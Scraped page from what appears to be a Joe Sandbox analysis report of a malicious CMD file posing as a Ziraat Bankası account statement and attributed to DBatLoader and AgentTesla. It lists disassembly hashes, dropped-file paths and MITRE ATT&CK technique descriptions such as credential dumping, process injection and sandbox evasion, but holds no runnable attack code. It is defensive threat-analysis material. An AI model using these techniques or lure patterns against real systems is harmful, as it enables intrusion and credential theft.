Instruction Fuzzy Hash: 93A26834A002158FDB61DF68C584B9EBBF2FB45314FA484AAD409AB361DB75ED86CF40

Function 064266E8 Relevance: .8, Instructions: 823COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ab24613e9515427e5a7f43a86a1b587b459fdd4782ed65783f84acf6551a306
Instruction ID: 02fe49b105482915b60de535b2f4e93d2e3027af47a3331c9717f0ccc3839038
Opcode Fuzzy Hash: 6ab24613e9515427e5a7f43a86a1b587b459fdd4782ed65783f84acf6551a306
Instruction Fuzzy Hash: 5162C030A002258FDB55DF68D984BAEB7F2EF85304F65846AE409EB354DB35ED46CB80

Function 0642C2A0 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecabf5129ac4549d3e5f6f82df98afac37701ea2d6cdc6389fc99a80d362c324
Instruction ID: c25a6a55a0fa92ca325c1ffac49ddc828579d9be23563ff484b32c6ef9e975c4
Opcode Fuzzy Hash: ecabf5129ac4549d3e5f6f82df98afac37701ea2d6cdc6389fc99a80d362c324
Instruction Fuzzy Hash: 2632A230A002168FDB95DF68D990BAEB7B6FF88310F60852AE405E7355DB35EC46CB91

Function 064256B8 Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82bd64011bba8c25bb4faed83fefb75f410d03bf8fc36481453a4be4fb6bb3cf
Instruction ID: ac5019e96927489e52d4931f04caa0258eb10d584ae379d6c240bcf5375f4d1e
Opcode Fuzzy Hash: 82bd64011bba8c25bb4faed83fefb75f410d03bf8fc36481453a4be4fb6bb3cf
Instruction Fuzzy Hash: 1D22D271F102269FDB69DF64D88066EB7B2EF84310F64846AD94A9B344DA34DC42CB91

Function 0642B760 Relevance: 8.0, Strings: 6, Instructions: 477
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 0642BCC5
$]q, xrefs: 0642BCED
$]q, xrefs: 0642BD21
$]q, xrefs: 0642BD2D
$]q, xrefs: 0642BCB9
$]q, xrefs: 0642BCF9

Memory Dump Source

Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3723351465
Opcode ID: 086449b327d5a2ac5c1b1caac12e00fc4b11a70c7caf3eb76ce28397e8776a8c
Instruction ID: 5d78d185daf748e5fd09d19d16788d73ef78076d2bd543fd5f64f66637af89df
Opcode Fuzzy Hash: 086449b327d5a2ac5c1b1caac12e00fc4b11a70c7caf3eb76ce28397e8776a8c
Instruction Fuzzy Hash: B6028F30E1022A8FDB65CF68D4806AEB7B1FF45318F60892AD449DB355DB34DD86CB91

Function 06429250 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 064292DE
$]q, xrefs: 064292A3
$]q, xrefs: 06429297
$]q, xrefs: 064292D2

Memory Dump Source

Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 681366409ec1117d585c3cb746d46785d0caabe5f996602a5a092987249b8577
Instruction ID: 9f10e27fe265b84ba98801e48ca268ffa097d002bcd581d95999590242a3bf27
Opcode Fuzzy Hash: 681366409ec1117d585c3cb746d46785d0caabe5f996602a5a092987249b8577
Instruction Fuzzy Hash: 98914D31F0022A8FDB55DF65D850BAEB7F6BF84304F608569D809EB344EB709D468B92

Function 06429241 Relevance: 2.7, Strings: 2, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06429297
$]q, xrefs: 064292D2

Memory Dump Source

Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: 11a3962f6ebef7961500f47a9c8f06fb4ddb44090d419d1075c31e4c7265084c
Instruction ID: 2dddb159629e0af5dbb7c4271f05086fe2a1cab6d95b57be322184033231c003
Opcode Fuzzy Hash: 11a3962f6ebef7961500f47a9c8f06fb4ddb44090d419d1075c31e4c7265084c
Instruction Fuzzy Hash: 8B517E31B051269FDB55DB75D850BAEB7F6FF88300F208469D849EB344EA709C02CB91

Function 064262E8 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 893338d5ecdc316c48ca3411ebbbcc2143c8de808b182718ff7a9c6c150936bd
Instruction ID: 4fe13f2c7f26dc3cd2e9ee574f9960e9417115514b67bc37dc0716b8f7fba1bc
Opcode Fuzzy Hash: 893338d5ecdc316c48ca3411ebbbcc2143c8de808b182718ff7a9c6c150936bd
Instruction Fuzzy Hash: B461C171F000224FDB55AA7ED88065FBADBAFD4220B65407AD80EDB364DEB5ED0287D1

Function 064246D8 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f67cac05cdf29b43cf002a6ffd4b984d44a88e68bf0b846efe02a685fe74888b
Instruction ID: 809ed677fe1e966e5b5dbc5c1c9457e661fc424ea4caf4f6bb557754c54917ea
Opcode Fuzzy Hash: f67cac05cdf29b43cf002a6ffd4b984d44a88e68bf0b846efe02a685fe74888b
Instruction Fuzzy Hash: 2A913D34E0021A8FDB61DF68C890B9EB7B1FF89304F208596D549AB355DB70AA85CF91

Function 064246F0 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a0b05194bfc8b779ab7d8abbde3f0a27f1d01780b2b381ee28977bf48424929
Instruction ID: 88a294c4c647f433a3fc48d475e11e7aee6d14e7502fa3219b3b7462a7b6cfdf
Opcode Fuzzy Hash: 4a0b05194bfc8b779ab7d8abbde3f0a27f1d01780b2b381ee28977bf48424929
Instruction Fuzzy Hash: 44913D34E1021A8BDF60DF68C890B9DB7B1FF89304F208595D549BB355DB70AA85CF91

Function 0642FB58 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91704a0f7608c93f5a83c1c9d5a36098b0256a75b5d8d370046001765cc193d3
Instruction ID: f7923b3b8ae09d8355c34f4adeafdbd3d481ba264a86feb04ef40e069053a2f7
Opcode Fuzzy Hash: 91704a0f7608c93f5a83c1c9d5a36098b0256a75b5d8d370046001765cc193d3
Instruction Fuzzy Hash: CC510D70B502154FEFA57A6DE99472F266EEB89740FF0482BD40AC73D5CA28CC498792

Function 0642FB68 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd5ab1de48f98786c5144059d0a40d6bc68fd258cfc8df19e72a83401e687c5b
Instruction ID: df85bd4adae68c092f466836b1a94e0d61f64252758221e4915543ec877d2dd0
Opcode Fuzzy Hash: cd5ab1de48f98786c5144059d0a40d6bc68fd258cfc8df19e72a83401e687c5b
Instruction Fuzzy Hash: B5510B70B602154FEFA5766DE95472F266EE789740FF0482AD80AC73D9CA28CC498792

Function 0642F2C1 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbc62fcb7a55506e6900954a50c30fb3a1352e3c89037e5eff70e3599d633dc9
Instruction ID: b762236339ce24a30f3d24123330603077bcb002fb92a1d203dcb91efea203b6
Opcode Fuzzy Hash: fbc62fcb7a55506e6900954a50c30fb3a1352e3c89037e5eff70e3599d633dc9
Instruction Fuzzy Hash: 130168317005210FDB668ABCD450B2F37EAEBC7310F60453AE00ACB340DA21DC0A83A2

Function 0642F2D0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ed1cf18b8b5e5a36be1df58d242fc09477b8f153bb77492276d6eb0db1a009f
Instruction ID: 7d7f3c76ee6b69893148f8e81fd0dab51d3a3551eb07a600e99cc1a0ad0f3cf3
Opcode Fuzzy Hash: 0ed1cf18b8b5e5a36be1df58d242fc09477b8f153bb77492276d6eb0db1a009f
Instruction Fuzzy Hash: 9F012D31B100220BDBA695BDE45476F73EBD7C6710F60443AE10EC7340DE15DC064396

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DBatLoader

Threatname: Agenttesla

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

C:\Users\Public\Libraries\PNO

C:\Users\Public\Libraries\Wisrysxl

C:\Users\Public\Libraries\Wisrysxl.PIF

C:\Users\Public\Libraries\lxsyrsiW.cmd

C:\Users\Public\Libraries\lxsyrsiW.pif

C:\Users\Public\Wisrysxl.url

C:\Users\Public\alpha.pif

C:\Users\Public\xpha.pif

Windows Analysis Report
TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd

Description:	Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre